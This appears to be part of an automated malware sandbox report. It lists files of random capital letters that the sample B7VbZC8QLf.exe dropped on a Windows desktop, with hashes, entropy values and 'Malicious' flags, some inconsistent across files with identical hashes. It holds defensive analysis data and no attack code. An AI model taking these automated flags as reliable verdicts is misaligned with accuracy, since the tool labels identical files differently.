JLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\Desktop\FENIVHOIKN.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695860210921229
Encrypted:	false
SSDEEP:	24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
MD5:	71B2CE35DD64EA4E8D5C67BD6BFF698E
SHA1:	48D65EB151E97D1D41267A43B4DC1801C4F89255
SHA-256:	A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
SHA-512:	73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
Malicious:	false
Preview:	FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG

C:\Users\user\Desktop\GAOBCVIQIJ.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\Desktop\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	true
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\Desktop\GIGIYTFFYT.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\Desktop\NIKHQAIQAU.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\Desktop\NIKHQAIQAU.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\Desktop\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	false
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\Users\user\Desktop\RAYHIWGKDI.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
SHA1:	EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
SHA-256:	F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
SHA-512:	10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
Malicious:	true
Preview:	RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

C:\Users\user\Desktop\SNIPGPPREP.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\Desktop\VAMYDFPUND.xlsx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690028473124583
Encrypted:	false
SSDEEP:	24:nCtOJ8AJzDzL/RXD03mp5reBXnqW8rdYu942ZCpjtJHU2coh:nsnA9/Z03y5qXnD0Yz0qjtJpN
MD5:	1E5D6B27E451F2406E5ED97F51985EE1
SHA1:	EDE59763DC7E1275594BDBB4EF90F9FEE78E946C
SHA-256:	A239ED81C44DBF3A8F7F28604058DE45B82FB3D596779B6B889837B2FE34A886
SHA-512:	619426DCC7B7C18488EC96D5474A5AA62EE4B1E7B52D8550B6A875AF0A19E02772D30142D9DC6986750732671605C7FF31E1F919CC6D121531ECBF0AE092E215
Malicious:	false
Preview:	VAMYDFPUNDEKDDABFYGQUEJPDEJQRXUZJGWCCCFXBISLBAZPZFZUOPASIBSPZLUDDUPRUHUUIJHOSYOAZNPTVHZSOVZRGZOUKAQEHTNLFNGLYDYUCGZPLLLOEHMTCCHZKQTFZGYFXUPESPRXRPJCGBDDSERLKFESFYUBNGVYLYUPKGUHNHSJITKDYFMCKPMQIQVZAFMCKDCYROFZHMGJMQRWYUHYHVRTNVUYOJXTDHGZTNEIQMQCBZXDPFJFNGRNBVMQWFGMLOWQCFSJCOQJGHEUOCLNTWHNHAGOTODKZYNINGMKGKTSEOLBKYRISYDHZOZINVXDDFVINOGNYWBEAYTTXSMSWAEGHZLSECWGHVUJJVTTQREREZKVNURFBXKMFFSJVVWOEKHLPTCOWUJHWSDFUKDNLAGSWYUGJMRJXXQRDDRLFRUUNRAXNLOUYXFWKVJGUQJJHPLTQELSOSFVIKIJHQPVLNQGQRDFLHUOUWYTAHHQSFZQBHLQJWUJVJPUBUAQTFOTVGLOZARCSHXCGYQYIDNDEHNFGLALSEIYWKOMVZTQBJZGRBJPSSWZPZKRLWDCYXTKIVIEXXRVZGNCFGSOUZLWFLDVXTEBFKTOHHOOJYSVZPFZXBJVQSOAXJEZIKYMAJHZMJPCAITWVFULTXNZLTXOUQONILVMPIEJGACXWGOEWJOJBLQJHQVHEYUQGLOZPDZOSSPVSZDXLGREZBQIVSASMXXLOQBKYWGPWRRHSSMYHGWBDFPDMXUISJUJUHAMPPRVABJXFEHOJLFPPRVMCBCSXCBNPGOOXIZIQFZDERGWQTALQWJYKPHMFIFYATLSCGMSHBWQYFHEGZQGQPMOIIHVVZQXVAUPPNJCVRKBVFXELRZEQZPLXOQQSXNGDZEGAJZDGSCYSLPQBSDTSQNIRNOZGTIBFJTEPZSUWIUBLEIVPBBHHLLIQQIUIIUARIYFPPNOAZPLXJGSPZJIXJTYLKJEEICOIZEUUYWP

C:\Users\user\Desktop\ZBEDCJPBEY.docx

Download File

Process:	C:\Users\user\Desktop\B7VbZC8QLf.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
